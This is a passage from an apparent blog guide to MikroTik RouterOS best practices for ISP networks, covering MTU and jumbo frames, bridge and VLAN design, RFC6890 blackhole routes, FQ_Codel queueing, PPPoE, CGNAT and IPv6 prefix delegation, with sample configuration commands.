set icmp-timeout=30s tcp-close-wait-timeout=1m tcp-fin-wait-timeout=2m tcp-last-ack-timeout=30s tcp-syn-received-timeout=1m tcp-syn-sent-timeout=2m tcp-time-wait-timeout=2m udp-stream-timeout=2m udp-timeout=30s
Figure-2 (Recommended Connection Tracking Timeout Values)
Miscellaneous
• Give the router an accurate system clock by enabling the Network Time Protocol (NTP) client and specifying a reliable NTP server such as this example:
“/system ntp client set enabled=yes server-dns-names=time.cloudflare.com”
MTU
To ensure reliable network performance, it is essential to configure the MTU consistently across all devices in the path in both L2 and L3. Inconsistent MTU configurations can result in dropped frames or strange behaviours. Additionally, it is essential to minimize IP fragmentation, properly deploy RFC4638, and ensure PMTUD is working for both IPv4 and IPv6. This will help to ensure reasonable auto-detected TCP MSS negotiation values.
Jumbo frames are ideally the way to go about MTU configuration as it’s future-proofing your network for whatever protocols you may throw at it. You should encourage your provider, peers, and customers to also configure jumbo frames on their network.
Bigger frames = more data per frame, meaning less frames required to transmit data, less CPU/resource utilisation required as packets per second flow will decrease.
Guidelines
Layer 2 MTU
L2 MTU, also known as the “media MTU” should be configured to the maximum supported value on physical interfaces such as Ethernet ports, SFP and wireless interfaces. This applies to any networking hardware, including routers, switches, and hypervisors. The maximum supported value may vary by vendor or model, but that is okay as the L3 MTU will handle the actual packet size negotiation.
However, it is important to note that, you must ensure the interfaces all have consistently maximum values to minimise the number of MTU profiles on the device – The switch chip or ASIC has limited support for n number of MTU profiles which if exceeded could hurt performance or lead to undefined behaviours.
By properly configuring the L2 MTU, you can run any protocol you want (such as VXLAN, MPLS, VPLS, or WireGuard) and still have an MTU far greater than 1500 for layer 3 packets, thereby avoiding fragmentation completely on the overlay, intra-as.
Example:
• Edge router (L2 MTU 9216) > BNG (L2 MTU 9216) > PE router (L2 MTU 9216) > Wireless AP (Bridged mode, often carries 9216 or similar L2 MTU) > Customer edge router (L2 MTU for WAN 9216)
• Edge router (L2 MTU 9216) > BNG (L2 MTU 9216) > PE router (L2 MTU 9216) > OLT (Bridged mode, often carries 9216 or similar L2 MTU) > Customer edge router (L2 MTU for WAN 9216)
Layer 3 MTU
Configure it to 9k MTU, strictly for all physical ports (ethernet, SFP etc). If there is any L2 overhead, such as on a layer 3 sub-interface VLAN, the system will automatically subtract from the L2 MTU and will show us the subtracted L2 MTU, so you can adjust layer 3 MTU accordingly.
The basic gist of this is, we use the 9k L3 MTU on intra-AS and even inter-AS physical interfaces, unless explicitly your peer doesn’t support 9k.
This allows your downstream transit customers to talk to your network and your customers in jumbo frames – For which, you should inform your customer if you’ve enabled jumbo frames for them, their L3 MTU must match your L3 MTU.
But if for example, you are configuring an interface towards your transit or IXP, then you should ask your provider if they support >1500 MTU and configure accordingly. Some transit providers and IXPs supports 9000 MTU, so we take advantage of that when possible.
Some things to be careful of:
• If using Stacked VLANs (QinQ), both S and C VLANs should have equal L3 MTU.
• If your customer equipment does not support high jumbo frame, then simply configure your L3 MTU to match theirs, which is usually 1500.
Example:
• Edge router (L3 MTU 9k) > BNG (L3 MTU 9k) > PE router (L3 MTU 9k) > Wireless AP (bridged mode and permits jumbo frames above 9k) > Customer edge router (L3 MTU for WAN will be 9k, assuming you configure 9k MTU on the S-C VLAN on the BNG)
• Edge router (L3 MTU 9216k) > BNG (L3 MTU 9216k) > PE router (L3 MTU 9k) > OLT (L3 MTU 9k) > (L3 MTU for WAN will be 9k, assuming you configure 9k MTU on the S-C VLAN on the BNG)
MTU can be mixed and match network-wide, but should never mismatch. PMTUD exists for a reason, I have built networks where I had 9k in some paths, 8k in some paths, 1500 in some paths, differences may be on physical interfaces where a sub-interface is configured on top of the physical interface (such as a bridge, or L3 subinterface VLANs on top of the bridge). With proper planning and thought, you shouldn’t have problems with 9k MTU mixed in with lower sized MTU.
The screenshots below are for references to give you an idea of what MTU mix/match (but never mismatch) looks like, this is based on a network I built from scratch. Ether1 is 1500 L3 MTU because it’s my MGMT/OOB port, the other physical ports are all 9k L3 MTU and maxed L2 MTU. The LACP bonding interfaces are my intra-as interfaces connected to my backbone routers, and 9K is configured on their side as well. The VPLS is jumbo frames MPLS network-wide to ensure I can carry as much VLANs as I want, as much L2VPN customers as I want without any problems for jumbo frames.
The VLANs on top of the bridge (excluding the pe01) are tagged to the VPLS circuit (also member of bridge) which are configured to 1500 MTU as these are layer 3 terminating interfaces, as my residential customers behind these VLANs, don’t have routers with jumbo frames, so 1500 makes sense. But if for example, on VLAN1501, one day, I moved all customers to jumbo frames 9k enabled routers? Then I simply change the MTU config on my VLAN interface right here, as the underlying transport network is already enabled with jumbo frames from day one.
Figure-3 MTU Overview
Figure-4 VPLS MTU
MTU Scripts
You can automate the MTU configuration using the scripts below. Please run each one separately as I didn’t put delays in between preventing synchronisation, but be mindful to manually configure L2, L3 MTU and advertised L2 MTU for VPLS/Other PPP interfaces.
#Run the ethernet MTU script first before the others#
#Script to autoconfigure max L2/L3 MTU on ethernet ports#
/interface ethernet
:foreach i in=[find] do={
set $i l2mtu=[/interface get $i max-l2mtu]
set $i mtu=[/interface get $i max-l2mtu]
}
#Script to autoconfigure max L3 MTU on Layer 3 sub-interface VLAN#
/interface vlan
:foreach i in=[find] do={
set $i mtu=[/interface get $i l2mtu]
}
#Script to autoconfigure max L3 MTU on Bonding interfaces#
/interface bonding
:foreach i in=[find] do={
set $i mtu=[/interface get $i l2mtu]
}
#Script to autoconfigure max L3 MTU on VXLAN#
/interface vxlan
:foreach i in=[find] do={
set $i mtu=[/interface get $i l2mtu]
}
#Script to autoconfigure max L2/L3 MTU on Wireless interfaces#
/interface wireless
:foreach i in=[find] do={
set $i l2mtu=2290
set $i mtu=2290
}
#
Linux Bridge Approach
A Linux bridge is a kernel module that acts as a virtual network switch and is used to forward packets between connected interfaces (also known as bridge ports or members). Many network operators do not follow MikroTik’s official guidelines to properly implement L2/3 using a bridge, which results in degraded performance as hardware offloading and/or bridge Fast Path/Fast Forward becomes unusable along with the inability to perform L2 filtering.
Linux driven hardware such as MikroTik or even Cumulus Linux devices rely heavily on Linux DSA. Linux DSA, Bridge, vlan-aware bridge is a very complex vast topic that currently doesn't have a comprehensive network engineer oriented documentation, I will try to work with a buddy of mine to write a new blog post to deep diving the Linux DSA/Bridge architecture and what it means for network engineers. Until then, just keep in mind that, for layer 3 offloading to work correctly, you need single bridge for all downstream interfaces and use the vlan-filtering to segregate them as "access ports" on a router, and ocassionally trunk port as well depending on your topology and use-case.
This means if you have a box, and the box has only one ASIC, then only one bridge can exist for physical ports/interfaces/LACP etc. However, you can create a loopback bridge, no problem.
To maximize performance benefits and give you L2 filtering capabilities, it is recommended by MikroTik to create a single bridge per device with all downstream (and intra-AS) interfaces (physical, LACP bonding etc) as bridge members. Tagged/untagged VLANs and hybrid VLANs can be configured using bridge VLAN filtering. Refer to vendor guidelines for model-specific configuration instructions.
If you created an LACP bonding interface between two routers (or switches) for redundancy, you can add the bond interface into the same bridge as a bridge member, where in turn either the bridge itself or the L3 sub-interface VLANs will be an interface list member depending on your topology as discussed in the previous interface lists section.
The management port on newer MikroTik device is a dedicated port connected to the CPU instead of the ASIC, similar to traditional networking devices from Cisco or Juniper. In such cases, the management port will be fully indepdent from any bridge, with its own indepedent VRF. However, if for example you’re transporting managment VLAN for a downstream device from a dowsntream port, example SFP+12, then in this case, SFP+12 will be member of the bridge with VLAN config on the bridge as usual.
A separate bridge can also be created as a loopback interface without impacting physical interface performance. You can assign the “.0” IPv4 address to this interface along with the “::” IPv6 address of an IPv6 subnet for management, testing purposes or for using as the loopback IPs with OSPF.
Below is a sample configuration from a CCR1036 router using MikroTik guidelines along with sample interface lists:
#Layer 3 configuration such as IP addressing is attached to these interfaces#
/interface vlan
add interface=bridge1 mtu=10218 name="Main VLAN" vlan-id=20
add interface=bridge1 mtu=10218 name="Management VLAN" vlan-id=10
/interface bridge
add frame-types=admit-only-vlan-tagged name=bridge1 vlan-filtering=yes
#Loopback interface#
add arp=disabled name=loopback protocol-mode=none
/interface bridge port
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether1 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether2 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether3 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether4 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether5 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether6 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether7 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether8 pvid=10
/interface bridge vlan
add bridge=bridge1 comment="Main VLAN" tagged=bridge1 vlan-ids=20
add bridge=bridge1 comment="Management VLAN" tagged=bridge1 vlan-ids=10
#Attaching IP addressing to the interfaces#
/ip address
add address=100.64.2.1/24 interface="Main VLAN" network=100.64.2.0
add address=103.176.189.0 comment="Public Loopback" interface=loopback network=103.176.189.0
add address=100.64.3.1/25 interface="Management VLAN" network=100.64.3.0
#Example for interface lists#
/interface list member
add interface="Main VLAN" list=LAN
add interface="Management VLAN" list="Management Interfaces"
R/M(STP)
I will not deep dive into how STP works, as that is outside the scope of a guide post like this one. However, a few quick things to keep in mind:
• MikroTik allows us to selectively enable/disable STP/BPDU per-port if required. This may be needed in your network with complex layer 2 designs.
Multicast traffic on the bridge
I personally had a few challenges with multicast traffic/IGMP Snooping best practices, for which I had to reach out to MikroTik support for some clarity. Below are a few basic guidelines to follow based on what I gathered from MikroTik docs and their support team. This is of utmost importance for networks that makes use of multicast routing and traffic for their IPTV services and similar.
• Be mindful of IGMP Snooping (and IGMP Proxy/PIM) limitations such as tagged VLAN, and features depending on your local network topology.
• Keep in mind that IPv6 SLAAC will break if you enable multicast querier, for which, you need RouterOS v7.7 onwards to work around this.
• In a layer 2 network if you are using IGMP Snooping, it should be enabled on all the bridges (devices) involved.
• You can also enable IGMP multicast querier on all the bridges, only one will get elected with the rest acting as failover in case a device fails.
• If you are using PPPoE then there’s no such thing as true multicast, because whilst it may multicast on layer 3, it will not be true multicast on layer 2 due to the nature of PPPoE which is a tunnel over layer 2. If you are using DHCP (preferably) or IPoE, then this issue does not apply.
IPv4
I have noticed a lot of operators talking about how short they are on IPv4 addresses – Yet for unknown reasons they like to waste 2 extra addresses for every PTP or inter-router link by using a /30. Please, stop doing that and start using /31s for PTP links as per RFC3021.
However, RouterOS v6+v7 does not support /31 natively, the following is how we do it.
Example below:
Prefix: 103.176.189.0/31
#MikroTik to MikroTik PTP#
#Router A#
/ip address
add address=103.176.189.0 interface=ether1 network=103.176.189.1 comment="/31 Example"
#Router B#
/ip address
add address=103.176.189.1 interface=ether1 network=103.176.189.0 comment="/31 Example"
#Cross vendor PTP#
#Router A Cisco/Juniper/Huawei etc#
interface eth2 address 103.176.189.0/31
#Router B MikroTik side#
/ip address
add address=103.176.189.1 interface=ether1 network=103.176.189.0 comment="/31 Example"
IPv6
As per RFC6164, it is advised to use /127s on PTP links to avoid various forms of network attacks described in the RFC.
However, for ease of management and subnetting, I would advise not to subnet longer (smaller) than a /64. Please click here to learn more about IPv6 architecture and subnetting plan.
Note that on MikroTik, /127s do not work with BGP for unknown reasons and hence the longest prefix size we can use would be a /126.
Example below:
Prefix: 2400:7060::/126
#Advertise=no because we aren't using SLAAC#
/ipv6 address
add address=2400:7060::1/126 advertise=no comment="Peering with Transit" interface=ether1
However, if you look closely, you might’ve noticed that I avoided using the initial zeroes leading interface ID “2400:7060::/126″ and instead used “2400:7060::1/126″. The reason for this is, that in some routers, using the “::” (all leading zeroes) interface ID (address) on a link could cause strange behaviours.
Routing loops with RFC6890 space
I have observed that in most of the networks, including my own personal home lab (AS149794), I find a lot of traffic where source IP = my end hosts or CPE WAN IP (either it is CGNAT IP or public IP), but destination IP = unused RFC6890 blocks. This is why I (and MikroTik themselves) created a forward rule to drop RFC6890 from escaping to WAN.
Now let us step back and think about this: The majority of the ISPs do not implement these filter rules, which means that traffic from customers whereby dst-IP=RFC6890 is forwarded from their CPE to the BNGs, and from there the underlying L3/L2 paths will carry it all the way to the edge router, where further, goes towards your transit or peers if there is a default route. If there is no default route or more specific route for any given dst-IP matching RFC6890 blocks, it would simply loop back and forth until the TTL expires, which means wasted resources, CPU and bandwidth when your network is at scale and you have thousands of customers. So in order to solve this with a quick fix, I derived a simple yet effective solution – Route RFC6890 blocks to blackhole.
We route all RFC6890 space to black hole directly on the edge routers for well edge cases, but we will also do the same on the BNGs directly.
It will not impact your use of the private space for any given interface/servers etc – Because remember, more specific prefixes always win and hence your private /24s etc will always be preferred over the less specific /10 for example and hence will be accessible. Someone on the MikroTik forum has discussed this a bit, in the past.
IPv4
#RouterOS v7#
#Copy and paste these on both Edge and BNG routers#
/ip route
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=0.0.0.0/8
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=172.16.0.0/12
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.168.0.0/16
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=10.0.0.0/8
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=169.254.0.0/16
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=127.0.0.0/8
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=224.0.0.0/4
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.18.0.0/15
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.0.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.2.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.51.100.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=203.0.113.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=100.64.0.0/10
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=240.0.0.0/4
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.88.99.0/24
add blackhole comment="Blackhole route for RFC6890 (limited broadcast)" disabled=no dst-address=255.255.255.255/32
#RouterOS v6#
#Copy and paste these on both Edge and BNG routers#
/ip route
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=0.0.0.0/8
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=172.16.0.0/12
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.168.0.0/16
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=10.0.0.0/8
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=169.254.0.0/16
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=127.0.0.0/8
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=224.0.0.0/4
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.18.0.0/15
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.0.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.2.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.51.100.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=203.0.113.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=100.64.0.0/10
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=240.0.0.0/4
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.88.99.0/24
add type=blackhole comment="Blackhole route for RFC6890 (limited broadcast)" disabled=no dst-address=255.255.255.255/32
IPv6
#RouterOS v7#
#Copy and paste these on both Edge and BNG routers#
/ipv6 route
add blackhole comment="Blackhole route for RFC6890" disabled=no dst-address=::1/128
add blackhole comment="Blackhole route for RFC6890" disabled=no dst-address=::/128
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=64:ff9b::/96
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=::ffff:0:0/96
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=100::/64
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001::/23
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001::/32
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001:2::/48
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001:db8::/32
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001:10::/28
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2002::/16
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=fc00::/7
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=fe80::/10
#In RouterOS v6, IPv6 blackhole is not supported#
QoS and Bufferbloat control
Going forward from 2023 onwards with RouterOS v7 (or any modern OS), based on the immense amount of work, data, and results published by Dave Täht on the subject of QoS/QoE and more specifically the main problem with this domain i.e. bufferbloat, I would recommend using FQ_Codel network-wide as the default queueing algorithm. The main reason to opt for FQ_Codel is primarily because it was designed for backbone network usage, such as ISPs, Telcos and carriers, compared to the end-user-oriented CAKE.
This means configuration wise, you apply the FQ_Codel queueing to all your physical ports and wireless interfaces across all your network devices. And ensure for customer queueing the same queue type is used.
An important point to note is the default values of FQ_Codel out-of-the-box are good up to 40Gbps physical interfaces. This means that if a single physical port is carrying more than 40Gbps traffic, you will need to tweak a custom FQ_Codel profile for that specific port.
Example configuration on a CCR1036:
/queue type
add kind=fq-codel name=FQ_Codel
/queue interface
set ether1 queue=FQ_Codel
set ether2 queue=FQ_Codel
set ether3 queue=FQ_Codel
set ether4 queue=FQ_Codel
set ether5 queue=FQ_Codel
set ether6 queue=FQ_Codel
set ether7 queue=FQ_Codel
set ether8 queue=FQ_Codel
set sfp-sfpplus1 queue=FQ_Codel
set sfp-sfpplus2 queue=FQ_Codel
In addition to network backbone FQ_Codel implementation, you can also consider deploying an open-source bufferbloat killer traffic shaping device using LibreQoS.
Below is a screenshot of the test results from this tool on a wireless ISP network that I architected and implemented myself from the ground up. I should note that, I implemented everything from this guide + other design considerations which includes network-wide FQ_Codel config, in my case there is no LibreQoS-like device as I wanted a simpler network topology, and the end result below is a result that’s better than even some fibre networks on PON out there in the market.
Figure-5 (Bufferbloat test on a wireless network designed and implemented by daryllswer.com)
For BNG
PPPoE
Issues
• Packet fragmentation due to non-standard 1500 MTU/MRU
• Typically, ISPs use 1492 or 1480 or some other strange MTU size
• Both BNG device and customer router need to make use of hacks like TCP MSS Clamping to work around this
• PMTUD is simply unreliable as per RFC 8900
• Gets worse with CGNAT because remote end-points cannot determine the MTU of your PPPoE customer behind it
• Lack of proper routing for PPPoE Clients (Interfaces or Inter-VLANs)
• Most assume that using a single profile for different PPPoE Servers running on different interfaces will work fine
Solutions
• The real long term solution is to migrate to DHCP to completely avoid all performance and MTU issues that are exclusively only an issue on PPPoE and similar encapsulation protocols.
• Deploy RFC 4638
• Keep in mind that in a network, MTU affects the whole path of L2/L3 devices whether physical or virtual, as long as you follow the MTU section above, you should be good
• Simply set MTU and MRU to 1500 inside PPPoE Server on the BNG
• However, if you are interested in the whole jumbo frames to your peers/PNI/IXP etc – You can configure MTU/MRU to fixed 9000 bytes, the reason for 9000 nytes for inter-AS traffic is explained here
• In order for this to work correctly you need to strictly follow the MTU section
• If using Wireless APs, then it would 2290-8=2282 bytes
Figure-6 (PPPoE Server MTU/MRU & TCP MSS Clamping config)
• Disable (and delete!) TCP MSS Clamping rules inside IP>Firewall>Mangle
• Why set some arbitrary value when you can let the engine determine automatically to ensure optimal performance?
• MikroTik has long since allowed automatic TCP MSS ClampingMake use of PPP>Profile>Default* to enable TCP MSS Clamping directly on the PPPoE engine. This will do the work for any customer whose MTU/MRU is less than 1500.
• On the customer side, not all routers can take advantage of RFC4638, such as TP-Link, Tenda etc. For them, MTU will remain capped at 1492.
• The 1492 limitation on their end won’t cause issues with packet fragmentation as packets would fragment at the source (their routers) before it exits the interface and hits the BNG and TCP Clamping on PPPoE engine takes care of anything coming in from the outside world toward the customer
• I have observed 1500 MRU when pinging from the outside world. Suggesting some of these consumer routers support 1500 MRU
• If they are using MikroTik, pfSense, VyOS etc, they can take advantage of RFC4638 aka 1500 MTU/MRU for their PPPoE Client
• Some ONT/ONU devices have strange behaviour for MTU negotiation where they simply do not allow RFC4638 to work (even in bridge mode), only a few brands like GX, TP-Link, and Huawei have been found to be flawless in my personal testing.
Verify MTU config
If you have properly configured MTU and MSS Clamping as per the steps above, then you should see the following results when testing from customer-side using this tool:
Figure-7 (MTU and TCP MSS correctly working on the internet)
Extra Note on PPPoE
• Create a single CGNAT pool on a per BNG basis and you can use it for n Number of PPPoE Servers on n number of interfaces
/ip pool
add name=CGNAT_Pool comment="100.64.0.0-9 is reserved for each PPPoE Server Gateway/Profile" ranges=100.64.0.10-100.127.255.255
• Here we are reserving 100.64.0.0-9 for gateway IPs on a per-interface/PPPoE server basis, assuming we only have 10 VLANs/Interfaces
• Reserve as per your local requirements
• Local Address in PPP Profile = Gateway IP address
• One common mistake is using the router’s public IP from the WAN interface as the local address, which I’ve seen could lead to issues like traceroute failures or some strange packet loss, you should be using an address that does not exist in IP>Address
• Each PPPoE Server needs unique profile/gateway in order to allow inter-VLAN communication between CPEs (which is needed to allow two customers behind a NATted IP to play a P2P Xbox game with each other on different VLANs) and will also ensure a clean network approach
• If you have 100 PPPoE Servers, there should be 100 unique PPP Profiles with unique local addresses for each
• Something like this for two servers:
/ppp profile
add change-tcp-mss=yes local-address=100.64.0.1 name=profile1 remote-address=CGNAT_Pool use-upnp=no
add change-tcp-mss=yes local-address=100.64.0.2 name=profile2 remote-address=CGNAT_Pool use-upnp=no
/interface pppoe-server server
add authentication=pap default-profile=profile1 interface=vlan20 keepalive-timeout=disabled max-mru=1500 max-mtu=1500 one-session-per-host=yes service-name=server1
add authentication=pap default-profile=profile2 disabled=no interface=vlan21 keepalive-timeout=disabled max-mru=1500 max-mtu=1500 one-session-per-host=yes service-name=server2
CGNAT
Issues
• The majority of ISPs are using RFC1918 subnets for CGNAT and will clash with subnets on the customer site
• Breaks NAT Traversal for protocols like IPSec, FTP etc
• Poor config, that breaks P2P traffic, kills the end-to-end principle
• Lack of hairpinning breaks inter-client P2P traffic
• Lacks EIM-NAT (newly added by MikroTik)
• Routing Loops will occur for any traffic coming from the outside destined towards the public IP pools that aren’t related to NATted traffic
Solutions
• Make use of the 100.64.0.0/10 subnet as it’s meant for CGNAT usage to prevent clashing on the customer site
• Enable all the NAT traversal Helpers on the NAT box, as shown below.
Figure-8 (NAT Traversal Helpers on RouterOS)
• Use the follow config template going forward (2024 onwards), which includes IPsec passthrough, EIM-NAT, Netmap functionality for 1:Many with consistent 1:1 port mapping. Please note rule order is important, the following template has accounted for rule order to capture packets correctly. We will assume “103.176.189.0/30” to be our public CGNAT pool.
/ip firewall nat
#EIM-NAT#
add action=endpoint-independent-nat chain=srcnat comment=EIM-NAT out-interface-list=WAN protocol=udp randomise-ports=no src-address=100.64.0.0/10 src-port=1024-65535 to-addresses=103.176.189.0/30
add action=endpoint-independent-nat chain=dstnat comment=EIM-NAT dst-address=103.176.189.0/30 dst-port=1024-65535 in-interface-list=WAN protocol=udp randomise-ports=no to-addresses=100.64.0.0/10
#Required as EIM-NAT in MikroTik doesn't support all layer 4 Protocols#
add action=netmap chain=srcnat comment="CGNAT Rule" dst-address-list=!not_in_internet ipsec-policy=out,none out-interface-list=WAN src-address-list=cgnat_subnet to-addresses=103.176.189.0/30
#Hairpinning rule to ensure P2P traffic works for all clients behind the CGNAT#
add action=masquerade chain=srcnat comment="Hairpin for CGNAT clients" dst-address-list=cgnat_subnet src-address-list=cgnat_subnet
• Here cgnat_subnet=address list containing CGNAT subnets i.e. 100.64.0.0/10
• dst-address-list=!not_in_internet is self-explanatory, anything destined towards private subnets shouldn’t be NATted towards WAN
• The hairpinning will allow customers to talk to each other using their CGNAT IP, Xbox makes use of this and is mentioned in RFC 7021.
• Avoid Deterministic NAT, the above configuration allows P2P traffic initiated from the inside to be reachable from the outside with various applications that make use of ephemeral ports/UDP NAT punching/STUN etc
• We were able to successfully seed the official Ubuntu Torrent behind the CGNAT with the above configuration, which can mean only one thing: P2P networking from in-bound established works!
Figure-9 (BitTorrent Seeding Behind CGNAT)
• We tried with src nat as action for src NAT chain but it resulted in the NATted public IP constantly changing on the customer side and breaking things
Below is what MikroTik support had to say about netmap vs src nat as action for src nat chain
Figure-10 (Src nat = breaks P2P traffic | Netmap = static mapping per client IP)
• Now we fix routing loops for the CGNAT public pool
/ip route
add blackhole comment="Blackhole-CGNAT pool" dst-address=103.176.189.0/30
Subscription Ratio Recommendation
In my extensive testing and observations, when using the above parameters and steps, I was able to have 200 users behind a /30 without any known complaints from them. BitTorrent worked as expected too, this is likely due to the obvious fact that not all users out of 200 will max out 65k connections and hence use up all the IP:Port combination. Where will you find a CPE that can handle 65k NAT entries anyways?
So tl;dr you can use a /30 per 200 users as long as you follow the steps properly and also to be future-proof and safe, ensure you provide IPv6 as well.
End Result
Figure-11 (Your NAT Table should look as dead simple as this one)
Logging compliances for government and regulatory requirements
For CGNAT logging for compliances purpose, you can use Traffic Flow which also adds additional option for NAT events logging in the configuration.
IPv6
Issues
• Addressing may not be optimally subnetted/broken down
• ISP may only have something like a single /48 with 5000 customers downstream which exceeds possible /56s out of the /48
• Not following the proper guidelines for IPv6 deployment
• Lack of persistent assignment feature on MikroTik
• This applies to the majority of ISPs even though they may use Cisco, Juniper etc which supports persistent assignment configuration
• Not properly ensuring that the customer’s WAN side gets a proper single /64
• Forcing the customer to have only a single /64 on the LAN side instead of /56
• MikroTik IPv6 RADIUS does not work correctly
Solutions
• A proper IPv6 architecture and subnetting plan should be implemented
• However, the logic is simple
Ensure customers get /64 WAN side and /56 LAN side for home users
Ensure customers get /64 WAN side and /48 LAN side for enterprise/SMEs/DC etc
• Ensure you request for appropriate prefix allocation based on your customer base from your Regional Internet registry/Local Internet registry
• Follow the proper guidelines and BCOPs
• I came across a solution for the lack of persistent assignment on MikroTik, simply use the following script and schedule it to run every five minutes:
#Please don't be stupid enough to set owner=Daryll#
/system script
add dont-require-permissions=no name=PPPoE-IPv6-Persistent owner=Daryll policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=\
"/ipv6 dhcp-server binding;\r\
\n:foreach i in=[find server~\"pppoe\"] do={\r\
\n make-static \$i;\r\
\n set \$i comment=[get \$i server];\r\
\n set \$i server=all;\r\
\n}"
Use the scheduler for automating it:
/system scheduler
add interval=5m name=PPPoE-IPv6-Persistent-AutoUpdate on-event=PPPoE-IPv6-Persistent policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
Now I will cover a simple configuration use-case where a BNG has exactly 1000 customers. The goal here is to ensure that the WAN side of each customer gets a /64 and the LAN side gets a /56.
• Disable redirects
/ipv6 settings set accept-redirects=no
• Next need to create two separate pools, one for WAN and one for the LAN side of the customer
• /ipv6 pool
add name=Customer-CPE-LAN prefix=2405:a140:8::/46 prefix-length=56
add name=Customer-CPE-WAN prefix=2405:a140:f:d400::/54 prefix-length=64
• Here, prefix-length specifies what prefix length the customer gets, which in this case as per standards, we are giving the WAN side a /64 and the LAN side a /56
• And finally, configure the pools to each PPPoE Profile as below
/ppp profile
set *0 dhcpv6-pd-pool=Customer-CPE-LAN remote-ipv6-prefix-pool=Customer-CPE-WAN
add name=profile2 dhcpv6-pd-pool=Customer-CPE-LAN remote-ipv6-prefix-pool=Customer-CPE-WAN
• Remote IPv6 prefix is for the WAN side of the customer
• DHCPv6 PD Pool is for the LAN side of the customer
Figure-12 (PPPoE IPv6 configuration)
That’s it, now the customers will dynamically get a routed /64 and routed /56 for WAN and LAN sides respectively.
Verify IPv6 config
If you have properly configured IPv6 as per the steps above, then you should see the following results when testing from customer-side using this tool:
Figure-13 (IPv6 working correctly)
Routing Loop prevention
If a customer happens to go offline (due to power loss etc), traffic destined for those customers will continue to persist until they time out leading to increased CPU usage. To solve this, we simply route aggregated customer prefixes to blackhole – Because remember in routing, more specific prefixes always win, so should those more specific prefixes go offline, the less specific (aggregated) routes take precedence in which case we are routing to blackhole and hence all pending traffic times out with immediate effect to give us optimal CPU usage.
#RouterOS v7 example#
/ipv4 route
add blackhole comment="Blackhole route for Customer CGNAT pool" disabled=no dst-address=103.176.189.0/25
add blackhole comment="Blackhole route for Customer public pool" disabled=no dst-address=103.176.189.128/25
/ipv6 route
add blackhole comment="Blackhole route for Customer LAN pool" disabled=no dst-address=2405:a140:8::/46
add blackhole comment="Blackhole route for Customer WAN pool" disabled=no dst-address=2405:a140:f:d400::/54
#RouterOS v6 example#
/ip route
add type=blackhole comment="Blackhole route for Customer CGNAT pool" disabled=no dst-address=103.176.189.0/25
add type=blackhole comment="Blackhole route for Customer public pool" disabled=no dst-address=103.176.189.128/25
#In RouterOS v6, IPv6 blackhole is not supported#
Firewall/Security
Issues
• Blocks inbound ports based on the false logic of “protecting” the customer
• Port blocking does nothing to improve security, it only breaks legitimate traffic such as apps or games that use various methods for VoIP
• Malware can make use of port 443 and that is the reality of modern-day malware anyway
